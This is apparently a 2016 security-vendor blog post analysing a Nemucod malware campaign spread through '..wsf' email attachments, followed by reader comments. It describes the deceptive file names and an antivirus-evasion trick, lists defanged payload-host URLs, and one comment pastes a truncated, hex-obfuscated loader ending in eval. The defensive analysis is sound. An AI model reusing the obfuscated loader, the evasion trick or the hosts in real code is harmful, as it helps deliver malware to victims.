Nemucod dot dot..WSF


The latest Nemucod campaign shows the malware distributing a spam email attachment with a .wsf extension, specifically ..wsf (with a double dot) extension.

It is a variation of what has been observed since last year (2015) – the TrojanDownloader:JS/Nemucod malware downloader using JScript. It still spreads through spam email attachment, typically inside a .zip file, using a file name of interest with .js or .jse as extension.

The following screenshots show how the malicious file attachment looks like in the recent campaign:

Example of how an email spam containing the latest version of Nemucod might look like

Figure 1: Example of how an email spam containing the latest version of Nemucod might look like

 

Example of how Nemucod malware looks like when extracted and opened with an archive viewer.

Figure 2: Example of how Nemucod malware looks like when extracted and opened with an archive viewer

What the double dots mean: Social engineering for unsuspecting eyes

As seen in the following file name samples, the double dot paired with the uncommon .wsf extension creates an illusion that the file name was either abbreviated, was intentionally omitted, or shortened by the system because it was too long:

  • profile-d39a..wsf
  • profile-e3de..wsf
  • profile-e7dc..wsf
  • profile-f8d..wsf
  • profile-fb50..wsf
  • spreadsheet_07a..wsf
  • spreadsheet_1529..wsf
  • spreadsheet_2c3b..wsf
  • spreadsheet_36ff..wsf
  • spreadsheet_3a8..wsf

Some might look at the sample file names and assume that they might originally have been a long unique string identifier consisting of random letters and numbers that could be a transaction ID, receipt number or even user ID:

  • profile-d39as1u3e8k9i3m4wsf
  • profile-e3dee1uwl8s10f3m4wsf
  • profile-e7dc4d1u3e83m4wsf
  • profile-f8dsdwsfe8k4i38wsf
  • profile-fb50s1u3l8k9i3m4wsf
  • spreadsheet_07as133e3k9i3e4wsf
  • spreadsheet_1529s15se8f9i3o6wsf
  • spreadsheet_2c3bs1u5dfk9i3m6wsf
  • spreadsheet_36ffs1ure8koei3d5ws
  • spreadsheet_3a8s1udwsf8s9i323wsf

However, this is not the case. These are script files that might contain malicious code which could harm your system.

Underneath the WSF

Windows Scripting File is a text document containing Extensible Markup Language (XML) code. It incorporates several features that offer you increased scripting flexibility. Because Windows script files are not specific to a script language, the underlying code can have either JavaScript or VBScript, depending on language declaration in the file. WSF acts as a container.

Underneath the WSF is the same typical Nemucod JScript code.

Nemucod code inside WSF: has encrypted code and the decryption is written under @cc_on (conditional compilation)

Figure 3: Nemucod code inside WSF: has encrypted code and the decryption is written under @cc_on (conditional compilation)

 

This Nemucod version leverages the @cc_on (conditional compilation) command. Such a command can possibly evade AV scanner detection. It tricks the AV scanners to think the command is part of a comment, thus preventing the AV scanners from interpreting it as an executable code.

Upon code decryption, the following URLs – where the malware payload is being hosted – are revealed:

  • hxxp://right-livelihoods.org/rpvch
  • hxxp://nmfabb.com/rgrna1gc
  • hxxp://www.fabricemontoyo.com/v8li8

Recent spam campaign and trends

The latest Nemucod telemetry for the past 15 days shows that it has constantly been active, although there haven’t been any huge spikes.

Daily detection trend for Nemucod. These are the unique machine encounters per day

Figure 4: Daily detection trend for Nemucod. These are the unique machine encounters per day

 

Geographic distribution of Nemucod. Data taken from July 3 to July 18, 2016

Figure 5: Geographic distribution of Nemucod. Data taken from July 3 to July 18,2016

 

Other than using ..wsf and @cc_on technique, we’ve also seen different and old tricks used as part of its social engineering tactics. This includes, but is not limited to:

  • Double extension (for example: <filename>pdf.js)
  • Invoice, receipt, and delivery related file names such as DHL, FedEx delivery, and so forth

Nemucod infection chain

Nemucod infection chain showing spam email distributing WSF which downloads and runs malware

Just like the Nemucod campaigns before this, the malware downloader payload includes ransomware, such as:

Mitigation and prevention

To avoid falling prey from this new Nemucod malware campaign:

Francis Tan Seng and Alden Pornasdoro
MMPC

Comments (8)

  1. adwbust says:

    that’s why js file extension should also get zone identifier!

    mmpc engine so weak against PUA installcore and html/phish!

    1. Alfred E. Neumann says:

      1. it’s the task of the mail client, web browser etc. to create the zone identifier;
      2. Internet Explorer, Outlook, Outlook Express, Windows (Live) Mail all add the zone identifier.

  2. John S. Kent says:

    Defender:
    Client Version: 6.1.7600.16385
    Engine Version: 1.1.12902.0
    Antispyware definitions: 1.225.2406.0

    var aQHe5 = (‘\x76\x61\x72\x20Fr\x20\x3d\x20″\x6f\x73\x65\x22\x20\x2b\x20\x22\x22\x3b\x0d’+
    ‘\x0a\x76a\x72\x20\x4e\x59f\x35\x20=\x20\x22c\x6c”\x20\x2b \x22\x22’+
    ‘;\x0d\x0a\x76\x61\x72\x20\x59\x67\x31\x20\x3d\x20\x22\x6c\x65\x22\x20\x2b\x20″‘+

    … Removed due to space restrictions …

    ‘\x28\x41\x62\x28\x5a\x4c\x72\x39\x29\x29\x3b\x0d\x0a\x20 \x20\x20\x4bJ\x70[‘+
    ‘\x52c4\x20\x2b\x20\x4a\x73\x20\x2b\x20U\x69\x39\x5d\x28Y\x61\x36\x2c\x20’+
    ‘\x32\x29;\x0d\x0a\x0d\x0a\x20\x20 \x20\x4b\x4a\x70\x5b\x44\x44\x67\x28\x44\x50’+
    ‘v1\x29\x20+ I\x4a\x672 + X\x41\x65\x33]\x28\x29\x3b’+
    ‘\x0d\x0a\x7d;’).split(”).join(”);
    var Um7 = aQHe5;

    eval(Um7);

    Above File: annual_report_~1FE1~..Wsf

    NOT REPORTED BY Defender EITHER IN “Quick” or “Full” SCAN!!!!!!!

    annual_report_~1FE1~..Wsf Defender Failure to Recognize Threat.Txt

    3d Post & https://blogs.technet.microsoft.com/mmpc/2016/07/23/nemucod/
    Shows NO COMMENT! Your Are CENSORING Posts to Your Benefit!

    1. msft-mmpc says:

      Hi John S. Kent, please see our About us page (https://blogs.technet.microsoft.com/mmpc/about/) for our blog comment moderation process. Sometimes there can be a delay before we can moderate and post comments. For this particular file, you can submit it to us by following the instructions at http://aka.ms/submitfile.

  3. Andrew says:

    How do you add .wsf to applocker? as far as I can tell you cant add additional extensions

    1. volkan says:

      How can we add .wsf to the file types to block in your AppLocker Group Policy. ?

  4. lee says:

    I found this as a javascript file in a gibberish-named .zip archive.

  5. volkan says:

    How can we add .wsf to the file types to block in your AppLocker Group Policy. ?

Skip to main content